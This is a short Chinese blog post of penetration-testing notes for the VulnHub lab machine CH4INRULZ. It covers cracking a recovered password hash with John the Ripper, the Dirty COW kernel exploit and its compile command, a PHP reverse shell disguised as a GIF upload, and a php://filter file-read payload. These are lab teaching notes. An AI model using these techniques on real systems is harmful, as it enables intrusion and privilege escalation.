二 CH4INRULZ_v1.0.1

最新推荐文章于 2022-10-25 00:27:52 发布
最新推荐文章于 2022-10-25 00:27:52 发布
阅读量355 收藏
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devil8123665/article/details/104332995
版权

二 CH4INRULZ_v1.0.1

1 john暴破密码

讲账号,更改为/etc/passwd的账号格式,。例如破解kali下的账号密码

第一步:unshadow /etc/passwd /etc/shadow > shadow_test

第二部:john shadow_test

便可以破解账号,如果破解过一次,可以使用john –show shadow_test 查看结果,或者查看~/.john/john.pot查看破解过的密码。

如果账号获取到的内容为“frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0”,模仿、/etc/passwd文件中的格式

Echo “frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0:1000:1000:frank,,,:/home/frank:/bin/bash” > test

John test

2kali自带webshell

/usr/share/webshells/

3脏牛提权

Linux kernel >= 2.6.222007年发行,到20161018日才修复

 https://github.com/FireFart/dirtycow

编译执行

 gcc -pthread dirty.c -o dirty -lcrypt

4gif上传法

Content-Disposition: form-data; name="fileToUpload"; filename="shell.gif"

Content-Type: image/gif

 

GIF98<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

上述红色位置,GIF98 加在文件头位置。

5 php://filter

file=php://filter/convert.base64-encode/resource=files_api.php

6 在kali上设置简单的HTTP服务器

python -m SimpleHttpServer 80

 

 

devil8123665
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机测试--CH4INRULZ_v1.0.1
ximo的博客
03-24 253
目录信息收集主机发现端口扫描目录扫描漏洞发现及利用反弹shell提权总结 信息收集 主机发现 端口扫描 四个端口。有两个开启http服务。 目录扫描 1.80端口: 2.8011端口: 漏洞发现及利用 1.先走80端口: 主页没有什么信息。 访问其他目录: /LICENSE: 无用信息。 /robots(.txt) /development: 一个登陆点,暂时搁置。 /vendor/: 目录遍历,但是没有有用的信息。 2.再看看8011端口: 只有一个目录,api: 这个API将用于与F
靶机CH4INRULZ_v1.0.1
weixin_43940853的博客
12-12 508
kali : 192.168.230.236 靶机 : 192.168.230.238 与之前的靶机不同,这次有ftp和8011,先登陆ftp看看 发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说) 接着看看80没有什么发现 找不到可入手的地方(80网页先暂时放一放) 一开始有一个8011端口,我们访问一下 访问之...
靶场渗透CH4INRULZ_v1.0.1
qq_35664104的博客
09-18 468
靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247/) 好久没有来做内网渗透了,碰巧遇到一个新鲜点的靶场,就来试一下。 kali:192.168.0.100 靶机: 192.168.0.101 先扫一下端口 nmap -sS -A -p- 192.168.0.101 开启了ftp,ssh,http服务,打开他的网址上去一看,是一个未完成的个人博客。在他的网站上并没有找到什么线索,u
[Vulnhub] CH4INRULZ_v1.0.1
weixin_63231007的博客
07-05 820
目录信息搜集图片🐎拿shell提权下载链接:ch4inrulz: 1.0.1 ~ VulnHubnmap -sP kali-ip得到靶机ip:192.168.236.136nmap -A 192.168.236.136 看看靶机开放了哪些服务 开放21 ftp 22 ssh 80和8011 http服务访问一下试试 发现是一个类似于博客的页面 dirb 扫描一下后台看看有没有登录地址或者隐藏页面 development处需要登录,其他没有有用信息dirb http://192.168.236.136 -.
VulnHub靶场之CH4INRULZ_v1.0.1
A_dmin的博客
10-31 3050
VulnHub靶场之CH4INRULZ_v1.0.1 继续靶机实验,老样子,先打开kali和靶机 查看kali的IP地址,然后进行主机查找 使用nmap命令:nmap -sP 192.168.80.1/24
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
CH4_ch4chemkin_chemkin_CH4_
10-03
标题 "CH4_ch4chemkin_chemkin_CH4_" 暗示了我们正在讨论与甲烷(CH₄)相关的Chemkin模型。Chemkin是一个广泛使用的化学动力学软件包,用于模拟燃烧、火焰和化学反应过程。描述中的"chemkin使用"进一步确认我们将...
Desktop.rar_CH4燃烧机理_CHEMKIN CH4_ch4 机理_chemkin燃烧机理_gri mech2.11
07-15
标题中的“Desktop.rar_CH4燃烧机理_CHEMKIN CH4_ch4 机理_chemkin燃烧机理_gri mech2.11”表明我们正在讨论一个与CH4(甲烷)燃烧机理相关的主题,具体是使用CHEMKIN软件进行分析的。CH4燃烧机理是指描述甲烷在燃烧...
ch4.rar_CH4气体_气体检测_甲烷_甲烷检测仪线
09-23
CH4气体检测技术及其应用》 在工业环境中,安全是至关重要的,特别是涉及到可燃气体,如甲烷(CH4)这样的物质时。甲烷,作为一种无色、无味的气体,广泛存在于天然气、煤矿和沼气中,是重要的能源之一。然而,...
CH4.rar_CH4_C语言
09-23
本资料"CH4.rar"聚焦于C语言中的常用算法,旨在帮助开发者深入理解和掌握这些核心算法,从而提升编程能力。 一、数组与指针 C语言中的数组和指针是实现算法的基础。数组是一种存储相同类型元素的集合,可以通过...
Vulnhub靶场渗透-CH4INRULZ_v1.0.1
paidx0
09-24 635
前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用 扫描 80 端口 扫描 8011 端口 看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件 对这个解密,拿到一对账号密码 ...
靶场练习第八天~vulnhub靶场之CH4INRULZ_v1.0.1
qq_57976347的博客
02-02 1721
一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现,使用nmap命令 具体使用方法:nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端口 3.用dirb命令,扫描隐藏文件或者网址 (1)使用 dirb http://192.168.101.109,扫描到一个development..
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 456
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
靶机渗透之CH4INRULZ_v1.0.1(三)
Delity的博客
07-27 394
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.143.129 nmap -sP 192.168.19.0/24 2.扫描靶机开放了哪些端口 nmap -sV 192.168.143.129 可以发现靶机开放了21 22 80 8011端口,可以从ssh服务、web服务进行入手 三、渗透过程 1.通过端口扫描发现21为FTP服务,版本为vsftpd 2.3.5;22为SSH服务,版本为OpenSSH 5
vulhub - CH4INRULZ_v1.0.1 writeup
Jiajiajiang_的博客
04-01 1414
主机来源:www.vulnhub.com 下载链接:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 准备工作: 下载.ova文件,直接双击即可安装成功 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 简介下netdiscover的用法...
VulnHub — CH4INRULZ_v1.0.1
qq_61768489的博客
09-09 1094
刚才上传文件后在/development/uploader/upload.php有回显,尝试读取这个upload.php。没有file参数发送给我 ,所以猜测这里可以传file参数,尝试了一下是post传参。文件读取刚刚上传的webshell.gif ,成功让gif文件以PHP执行。正在开发的api接口, 猜测files_api.php 可以文件读取。得到一组用户名和密码, frank frank!这里出问题了 ,靶机的g++环境有问题?然后访问到a目录发现 脚本上传成功,解压脚本。
CH4INRULZ vulnhub靶场
东隅的博客
10-25 681
这里只要重点看注释里的内容,看起来是用户名密码组合,用户名frank,密码貌似是被加密的,把用户名密码用txt保存,用john解密一下。打开发现给了一个登录框,还没法登陆,再看别的地方,继续扫一下备份文件,在linux系统里面bak结尾的备份文件比较多。能读取到文件,可以尝试读取刚刚文件上传的那个php文件,以找到我们图片马上传的路径。转到var路径看一下文件目录,找一个比较高的用户权限目录上传脏牛,那个a可以。用获取到的这个用户名密码登陆刚刚的development目录里面的登录框。
vulnhub之CH4INRULZ渗透测试实战
weixin_43862283的博客
04-21 932
vulnhub之CH4INRULZ渗透测试实战 一、环境搭建 目标: 获取root权限,并获得flag 难度:中级 下载链接:https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 测试环境:VMware 攻击机:kali linux 2019 IP地址为192.168.34.179 二、渗透实战过程 1.发现主机 老生常谈,第一步当...
long tempTIM1CH4; uint8 TIM1CH4_CAPTURE_STA; //输入捕获状态。 uint16 TIM1CH4_CAPTURE_VAL; //输入捕获值。 uint16 TIM1CH4_CAPTURE_FRE;
最新发布
06-02
这段代码是用于STM32单片机中使用定时器1的通道4来进行输入捕获(即测量外部信号的频率或占空比)。其中,定义了一个名为tempTIM1CH4的长整型变量用于存储捕获值,TIM1CH4_CAPTURE_STA是一个用于记录输入捕获状态的无符号8位整型变量,TIM1CH4_CAPTURE_VAL是一个用于存储输入捕获值的无符号16位整型变量,TIM1CH4_CAPTURE_FRE是一个用于存储输入捕获频率的无符号16位整型变量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值